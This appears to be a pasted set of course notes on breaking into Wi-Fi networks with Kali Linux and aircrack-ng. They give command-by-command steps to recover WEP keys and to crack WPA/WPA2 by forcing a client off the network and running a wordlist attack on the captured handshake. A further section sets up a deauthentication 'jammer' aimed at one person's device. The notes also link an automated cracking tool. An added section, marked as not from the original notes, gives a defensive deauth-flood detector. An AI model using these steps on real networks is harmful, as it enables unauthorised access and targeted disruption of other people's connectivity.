viprajput

g1s20

Jul 3rd, 2018
SESSION 20
===========

REQUIREMENTS FOR CRACKING WIRELESS NETWORKS
============================================

OS : Kali Linux
Hardware Components : Wireless adapter that supports monitor mode (using a "Leoxsys 150 HGN")
Tools : (CLI tools pre-installed in Kali Linux)
- Airmon-ng : For enabling monitor mode.
- Airodump-ng : For capturing (dumping) Wi-Fi packets.
- Aireplay-ng : For generating and injecting frames/packets and replaying captured network packets.
- Aircrack-ng : For running a brute-force / dictionary attack on the captured Wi-Fi packets with the help of a wordlist.


Aireplay-ng
============
Aireplay-ng is used to inject/replay frames. Its primary function is to generate traffic for later use in aircrack-ng for cracking WEP and WPA-PSK keys. It offers different attacks, such as deauthentication (for the purpose of capturing WPA handshake data) and fake authentication.


Aircrack-ng
===========
Aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program. It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. It uses methods that incorporate various statistical attacks to discover the WEP key, in combination with brute forcing. Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (a file of candidate passwords) has to be used.


Workflow for Cracking WEP, WPA/WPA2:
====================================

Step 1: Start monitor mode.
Step 2: Start gathering information about the wireless signals.
Step 3: Start capturing the packets.
Step 4: Crack the Wi-Fi password.

--------------------------------------------------------------------------------------------------


CRACKING WEP ENCRYPTION
========================

Steps :

# iwconfig // Wireless adapter name: wlan0

# airmon-ng start wlan0 // Starting monitor mode on the adapter

# kill <PID> // Killing the interfering processes reported by airmon-ng

# iwconfig // After enabling monitor mode the adapter name is : wlan0mon

# airodump-ng wlan0mon // Start dumping on the wireless adapter

# airodump-ng --bssid <target router's BSSID> -c <channel number> -w wepp wlan0mon // saving the dumped packets to a file.
--bssid : router's MAC address
-c : channel number
-w : write the captured wireless packets to a file with this prefix
(airodump-ng automatically appends -01, -02, ... to the file name. Here it'll be wepp-01.cap .)

# aireplay-ng -1 0 -a <BSSID of my WEP router> wlan0mon // Fake authentication with the router (aireplay-ng attack -1)

NOTE : There must be at least 15,000 beacon packets captured.

# aircrack-ng wepp-01.cap // Cracking the stored WEP packets


The key is shown with colons (:) between the bytes. For example, if the passphrase of the access point is "1234567890", the cracked key will be shown as "12:34:56:78:90".
Remove the (:) signs from the key found, and the password is in front of you.

--------------------------------------------------------------------------------------------------


CRACKING WPA/WPA2
==================

Steps :

# iwconfig // Wireless adapter name: wlan0

# airmon-ng start wlan0 // Starting monitor mode on the adapter

# kill <PID> // Killing the interfering processes reported by airmon-ng

# iwconfig // After enabling monitor mode the adapter name is : wlan0mon

# airodump-ng wlan0mon // Start dumping on the wireless adapter

# airodump-ng --bssid <target router's BSSID> -c <channel number> -w wpa2 wlan0mon // saving the dumped packets to a file.
--bssid : router's MAC address
-c : channel number
-w : write the captured packets to a file with this prefix
(airodump-ng automatically appends -01, -02, ... to the file name. Here it'll be wpa2-01.cap .)

# aireplay-ng -0 10 -a <BSSID of router> -c <MAC of client/user> wlan0mon // Sending deauthentication packets to a client/user of the router.
-0 : deauthentication attack (followed by the number of deauthentication packets to send)
-a : MAC of the target router
-c : MAC of any connected client/user
(Now we are sending 10 deauthentication packets to the client; when the client tries to reconnect, the Wi-Fi handshake for that access point is captured.)

# aircrack-ng -w <path of dictionary> <filename*.cap> // Starting a dictionary attack with a wordlist
The wordlist we are using is rockyou.txt, which is pre-installed in Kali Linux. The path of rockyou.txt is : /usr/share/wordlists/rockyou.txt .

This will show you the password as (KEY FOUND : Password of the Access Point).

--------------------------------------------------------------------------------------------------

CREATING A WIFI JAMMER FOR A SPECIFIC PERSON
============================================

# airodump-ng -c <channel number> -w file --bssid <BSSID of router> wlan0mon

# aireplay-ng --deauth 0 -c <MAC of the specific device> -a <BSSID of the router> wlan0mon
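
The deauthentication step in the WPA/WPA2 section and the jammer above both rely on a burst of deauth frames carrying the router's address, and that burst is exactly what a wireless IDS keys on. The following is an added example (not from the original notes or the aircrack-ng suite): a sliding-window deauth-flood detector in Python run over a constructed frame trace; the MAC addresses, the 2-second window and the threshold of 8 frames are assumptions.

```python
from collections import defaultdict, deque

# 802.11 management frame subtypes (from the standard)
BEACON, DISASSOC, DEAUTH = 0x08, 0x0A, 0x0C


def detect_deauth_floods(frames, window_s=2.0, threshold=8):
    """Flag (src, dst) pairs that send `threshold` or more deauth/disassoc
    frames inside any sliding window of `window_s` seconds.

    frames: iterable of (timestamp_s, subtype, src_mac, dst_mac).
    Returns {(src, dst): (first_ts, last_ts, peak_count)}. A healthy AP
    emits these frames rarely, so a volley from the AP's own address towards
    one client is the signature worth alerting on.
    """
    recent = defaultdict(deque)   # per pair: timestamps still inside the window
    alerts = {}
    for ts, subtype, src, dst in sorted(frames):
        if subtype not in (DEAUTH, DISASSOC):
            continue
        key = (src.lower(), dst.lower())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window_s:       # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            first, _, peak = alerts.get(key, (q[0], ts, 0))
            alerts[key] = (first, ts, max(peak, len(q)))
    return alerts


# Constructed sample trace (not a real capture): normal beacons, one benign
# deauth, then a volley of deauth/disassoc frames aimed at a single client.
AP, CLIENT = "aa:bb:cc:dd:ee:ff", "11:22:33:44:55:66"   # assumed addresses
SAMPLE_FRAMES = (
    [(i * 0.1024, BEACON, AP, "ff:ff:ff:ff:ff:ff") for i in range(40)]
    + [(1.5, DEAUTH, AP, CLIENT)]                                   # benign
    + [(30.0 + i * 0.05, DEAUTH, AP, CLIENT) for i in range(10)]    # volley
    + [(30.6, DISASSOC, AP, CLIENT)]
)

if __name__ == "__main__":
    for (src, dst), (first, last, peak) in detect_deauth_floods(SAMPLE_FRAMES).items():
        print(f"ALERT deauth flood {src} -> {dst}: {peak} frames "
              f"between t={first:.2f}s and t={last:.2f}s")
```

The single deauth at t=1.5s falls outside the window and is ignored; only the volley trips the alert, which is the behaviour you want before tuning the threshold on a real trace.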

--------------------------------------------------------------------------------------------------

Other Automated Tool For Wireless Cracking :

FLUXION - https://github.com/FluxionNetwork/fluxion
Only for Linux OS.


--------------------------------------------------------------------------------------------------


UNHACK - https://apkpure.com/unhack/com.lucideustech.unhack